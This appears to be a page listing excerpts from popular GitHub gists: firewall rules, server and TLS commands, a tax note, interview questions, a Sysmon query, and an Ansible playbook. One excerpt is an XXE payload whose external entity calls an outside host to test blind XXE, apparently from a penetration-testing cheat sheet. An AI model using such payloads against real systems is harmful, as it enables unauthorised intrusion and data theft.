virtualstaticvoid

# Modify this file accordingly for your specific requirement.
# http://www.thegeekstuff.com
# 1. Delete all existing rules
iptables -F

# 2. Set default chain policies
iptables -P INPUT DROP
iptables -P FORWARD DROP
iptables -P OUTPUT DROP

avar

# To check if this is up-to-date with the tax rates go to
# http://www.expatax.nl/tax-rates-2016.php and see if there's anything
# newer there.
#
# I make no guarantees that any of this is correct. I calculated this
# at the time and have been updating it when new tax rates come along
# because people keep finding this useful.
#
# There's also an interactive JS version of this created by
# @stevermeister at

johntyree

#!/usr/bin/env sh

# Download lists, unpack and filter, write to stdout
curl -s https://www.iblocklist.com/lists.php \
  | sed -n "s/.*value='\(http:.*=bt_.*\)'.*/\1/p" \
  | xargs wget -O - \
  | gunzip \
  | egrep -v '^#'

willurd

Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.

Discussion on reddit.

Python 2.x

$ python -m SimpleHTTPServer 8000

plentz

# to generate your dhparam.pem file, run in the terminal
openssl dhparam -out /etc/nginx/ssl/dhparam.pem 2048

jvns

A lot of these are outright stolen from Edward O'Campo-Gooding's list of questions. I really like his list.

I'm having some trouble paring this down to a manageable list of questions -- I realistically want to know all of these things before starting to work at a company, but it's a lot to ask all at once. My current game plan is to pick 6 before an interview and ask those.

I'd love comments and suggestions about any of these.

I've found questions like "do you have smart people? Can I learn a lot at your company?" to be basically totally useless -- everybody will say "yeah, definitely!" and it's hard to learn anything from them. So I'm trying to make all of these questions pretty concrete -- if a team doesn't have an issue tracker, they don't have an issue tracker.

I'm also mostly not asking about principles, but the way things are -- not "do you think code review is important?", but "Does all code get reviewed?".

tsiege

ANNOUNCEMENT

I have moved this over to the Tech Interview Cheat Sheet Repo and has been expanded and even has code challenges you can run and practice against!






\

RamblingCookieMonster

    # Download and dot source Get-WinEventData
        # https://gallery.technet.microsoft.com/scriptcenter/Get-WinEventData-Extract-344ad840
        . "\\path\to\Get-WinEventData.ps1"

    # Download and Set up Sysmon as desired
        # http://technet.microsoft.com/en-us/sysinternals/dn798348
        # http://www.darkoperator.com/blog/2014/8/8/sysinternals-sysmon

    #Use Get-WinEvent and Get-WinEventData to obtain events and extract XML data from them - let's see all the properties behind one!
        Get-WinEvent -FilterHashtable @{logname="Microsoft-Windows-Sysmon/Operational";id=3} |

staaldraad

--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

ryane

---
- hosts: all

  vars:
    UBUNTU_COMMON_ROOT_PASSWORD: 'xxxxx'
    UBUNTU_COMMON_DEPLOY_PASSWORD: 'xxxxx'
    UBUNTU_COMMON_LOGWATCH_EMAIL: user@example.com
    ubuntu_common_deploy_user_name: deploy
    ubuntu_common_deploy_public_keys:
      - ~/.ssh/id_rsa.pub